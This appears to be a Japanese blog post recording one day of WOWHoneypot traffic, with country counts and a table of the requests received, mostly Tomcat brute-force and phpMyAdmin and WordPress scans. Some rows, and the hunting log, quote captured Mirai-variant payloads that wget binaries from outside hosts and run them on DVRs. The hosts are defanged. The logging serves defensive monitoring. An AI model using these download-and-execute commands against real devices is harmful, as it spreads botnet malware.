WOWHoneypot観察(237日目)
2019/11/08(金)
トータルは8399件でした。
ハンティングログは以下です。
189.172.187[.]250 wget+hxxp[:]//185.172.110[.]220/mipsel
www.virustotal.com
www.virustotal.com
IPのロケーション別の件数は以下です。
| イタリア | 4005 |
| アルゼンチン | 4002 |
| アメリカ | 319 |
| フランス | 13 |
| オランダ | 10 |
| ドイツ | 9 |
| ブラジル | 7 |
| ロシア | 4 |
| エストニア | 3 |
| インド | 2 |
| 中国 | 2 |
| トルコ | 2 |
| カナダ | 2 |
| メキシコ | 2 |
| ラトビア | 2 |
| イギリス | 2 |
| クロアチア | 1 |
| アイスランド | 1 |
| ハンガリー | 1 |
| スロバキア | 1 |
| ベトナム | 1 |
| チリ | 1 |
| コロンビア | 1 |
| イラク | 1 |
| イラン | 1 |
| マレーシア | 1 |
| 南アフリカ | 1 |
| ナイジェリア | 1 |
| 香港 | 1 |
| 台湾 | 1 |
| 件数 | 概要 | リクエスト |
|---|---|---|
| 8004 | Tomcat管理ページに対するブルートフォース攻撃 | GET /manager/html |
| 75 | アクセス | GET / |
| 8 | phpMyAdminの調査 | GET /phpMyAdmin-2.10.0.2/scripts/setup.php |
| 8 | phpMyAdminの調査 | GET /phpMyAdmin-2.10.0.1/scripts/setup.php |
| 8 | phpMyAdminの調査 | GET /phpMyAdmin-2.10.0.0/scripts/setup.php |
| 8 | phpMyAdminの調査 | GET /dbadmin/scripts/setup.php |
| 4 | phpMyAdminの調査phpMyAdminの調査 | GET /w00tw00t.at.blackhats.romanian.anti-sec:) |
| 4 | phpMyAdminの調査 | GET /sql/scripts/setup.php |
| 4 | phpMyAdminの調査 | GET /scripts/setup.php |
| 4 | phpMyAdminの調査 | GET /pma2/scripts/setup.php |
| 4 | phpMyAdminの調査 | GET /pma/scripts/setup.php |
| 4 | phpMyAdminの調査 | GET /phpmyadmin2/scripts/setup.php |
| 4 | phpMyAdminの調査 | GET /phpmyadmin/scripts/setup.php |
| 4 | phpMyAdminの調査 | GET /phpmy/scripts/setup.php |
| 4 | phpMyAdminの調査 | GET /phpadmin/scripts/setup.php |
| 4 | phpMyAdminの調査 | GET /phpMyAdmin3/scripts/setup.php |
| 4 | phpMyAdminの調査 | GET /phpMyAdmin1/scripts/setup.php |
| 4 | phpMyAdminの調査 | GET /phpMyAdmin/scripts/setup.php |
| 4 | phpMyAdminの調査 | GET /phpMyAdmin-3.4.3.1/scripts/setup.php |
| 4 | phpMyAdminの調査 | GET /phpMyAdmin-3.1.2.0/scripts/setup.php |
| 4 | phpMyAdminの調査 | GET /phpMyAdmin-3.1.2.0-english/scripts/setup.php |
| 4 | phpMyAdminの調査 | GET /phpMyAdmin-3.1.2.0-all-languages/scripts/setup.php |
| 4 | phpMyAdminの調査 | GET /phpMyAdmin-3.1.0.0/scripts/setup.php |
| 4 | phpMyAdminの調査 | GET /phpMyAdmin-3.1.0.0-english/scripts/setup.php |
| 4 | phpMyAdminの調査 | GET /phpMyAdmin-3.0.1.1/scripts/setup.php |
| 4 | phpMyAdminの調査 | GET /phpMyAdmin-3.0.1.0/scripts/setup.php |
| 4 | phpMyAdminの調査 | GET /phpMyAdmin-3.0.1.0-english/scripts/setup.php |
| 4 | phpMyAdminの調査 | GET /phpMyAdmin-3.0.0.0-all-languages/scripts/setup.php |
| 4 | phpMyAdminの調査 | GET /phpMyAdmin-2/scripts/setup.php |
| 4 | phpMyAdminの調査 | GET /phpMyAdmin-2.9.2/scripts/setup.php |
| 4 | phpMyAdminの調査 | GET /phpMyAdmin-2.9.1/scripts/setup.php |
| 4 | phpMyAdminの調査 | GET /phpMyAdmin-2.9.0/scripts/setup.php |
| 4 | phpMyAdminの調査 | GET /phpMyAdmin-2.9.0.2/scripts/setup.php |
| 4 | phpMyAdminの調査 | GET /phpMyAdmin-2.9.0.1/scripts/setup.php |
| 4 | phpMyAdminの調査 | GET /phpMyAdmin-2.9.0-rc1/scripts/setup.php |
| 4 | phpMyAdminの調査 | GET /phpMyAdmin-2.8.9/scripts/setup.php |
| 4 | phpMyAdminの調査 | GET /phpMyAdmin-2.8.8/scripts/setup.php |
| 4 | phpMyAdminの調査 | GET /phpMyAdmin-2.8.7/scripts/setup.php |
| 4 | phpMyAdminの調査 | GET /phpMyAdmin-2.8.6/scripts/setup.php |
| 4 | phpMyAdminの調査 | GET /phpMyAdmin-2.8.5/scripts/setup.php |
| 4 | phpMyAdminの調査 | GET /phpMyAdmin-2.8.4/scripts/setup.php |
| 4 | phpMyAdminの調査 | GET /phpMyAdmin-2.8.3/scripts/setup.php |
| 4 | phpMyAdminの調査 | GET /phpMyAdmin-2.8.2/scripts/setup.php |
| 4 | phpMyAdminの調査 | GET /phpMyAdmin-2.8.2.3/scripts/setup.php |
| 4 | phpMyAdminの調査 | GET /phpMyAdmin-2.7.7/scripts/setup.php |
| 4 | phpMyAdminの調査 | GET /phpMyAdmin-2.7.6/scripts/setup.php |
| 4 | phpMyAdminの調査 | GET /phpMyAdmin-2.7.5/scripts/setup.php |
| 4 | phpMyAdminの調査 | GET /phpMyAdmin-2.7.0-rc1/scripts/setup.php |
| 4 | phpMyAdminの調査 | GET /phpMyAdmin-2.7.0-pl2/scripts/setup.php |
| 4 | phpMyAdminの調査 | GET /phpMyAdmin-2.7.0-pl1/scripts/setup.php |
| 4 | phpMyAdminの調査 | GET /phpMyAdmin-2.7.0-beta1/scripts/setup.php |
| 4 | phpMyAdminの調査 | GET /phpMyAdmin-2.6.9/scripts/setup.php |
| 4 | phpMyAdminの調査 | GET /phpMyAdmin-2.6.6/scripts/setup.php |
| 4 | phpMyAdminの調査 | GET /phpMyAdmin-2.6.4-rc1/scripts/setup.php |
| 4 | phpMyAdminの調査 | GET /phpMyAdmin-2.6.4-pl4/scripts/setup.php |
| 4 | phpMyAdminの調査 | GET /phpMyAdmin-2.6.4-pl3/scripts/setup.php |
| 4 | phpMyAdminの調査 | GET /phpMyAdmin-2.6.1-pl3/scripts/setup.php |
| 4 | phpMyAdminの調査 | GET /phpMyAdmin-2.6.1-pl2/scripts/setup.php |
| 4 | phpMyAdminの調査 | GET /phpMyAdmin-2.11.1.2/scripts/setup.php |
| 4 | phpMyAdminの調査 | GET /phpMyAdmin-2.11.1.1/scripts/setup.php |
| 4 | phpMyAdminの調査 | GET /phpMyAdmin-2.11.1.0/scripts/setup.php |
| 4 | phpMyAdminの調査 | GET /phpMyAdmin-2.11.1-all-languages/scripts/setup.php |
| 4 | phpMyAdminの調査 | GET /phpMyAdmin-2.11.0.0/scripts/setup.php |
| 4 | phpMyAdminの調査 | GET /phpMyAdmin-2.10.2.0/scripts/setup.php |
| 4 | phpMyAdminの調査 | GET /phpMyAdmin-2.10.1.0/scripts/setup.php |
| 4 | phpMyAdminの調査 | GET /phpMyAdmin-2.10.0/scripts/setup.php |
| 4 | phpMyAdminの調査 | GET /mysqladmin/scripts/setup.php |
| 4 | phpMyAdminの調査 | GET /mysql/scripts/setup.php |
| 4 | phpMyAdminの調査 | GET /db/scripts/setup.php |
| 4 | phpMyAdminの調査 | GET /admin/scripts/setup.sh |
| 4 | phpMyAdminの調査 | GET /admin |
| 4 | phpMyAdminの調査 | GET /_phpMyAdmin/scripts/setup.php |
| 4 | phpMyAdminの調査 | GET /SQL/scripts/setup.php |
| 4 | phpMyAdminの調査 | GET /MyAdmin/scripts/setup.php |
| 3 | DVR/NVR/IPC のAPIにおける脆弱性を狙った通信 | POST /editBlackAndWhiteList |
| 3 | クローリング | HEAD /robots.txt |
| 2 | 調査 | GET /script |
| 1 | Linksys ルータの E シリーズの脆弱性を狙った通信 | POST /tmUnblock.cgi |
| 1 | WordPressの調査 | GET /wp-login.php |
| 1 | MVPower DVRなどを狙うMirai亜種の攻撃 | GET /shell?cd+/tmp;rm+-rf+a.arm7+a.arm;cd+/tmp;wget+hxxp[:]/\/172.86.75.240/a.arm7;chmod+777+a.arm7;./a.arm7+jaws.arm7;cd+/tmp;wget+hxxp[:]/\/172.86.75.240/a.arm;chmod+777+a.arm;./a.arm+jaws.arm |
| 1 | MVPower DVRなどを狙うMirai亜種の攻撃 | GET /shell?cd+/tmp;rm+-rf+.t;wget+hxxp[:]/\/5.206.227.65/arm7.tsunami;mv+arm7.tsunami+.t;chmod+777+.t;./.t;rm+-rf+.t |
| 1 | Yealinkの調査? | GET /servlet?m=mod_listener&p=login&q=loginForm&jumpto=status |
| 1 | クローリング | GET /robots.txt |
| 1 | WordPressのユーザー情報の調査 | GET ///wp-json/wp/v2/users/ |
| 1 | WordPressのユーザー情報の調査 | GET ///?author=1 |
にほんブログ村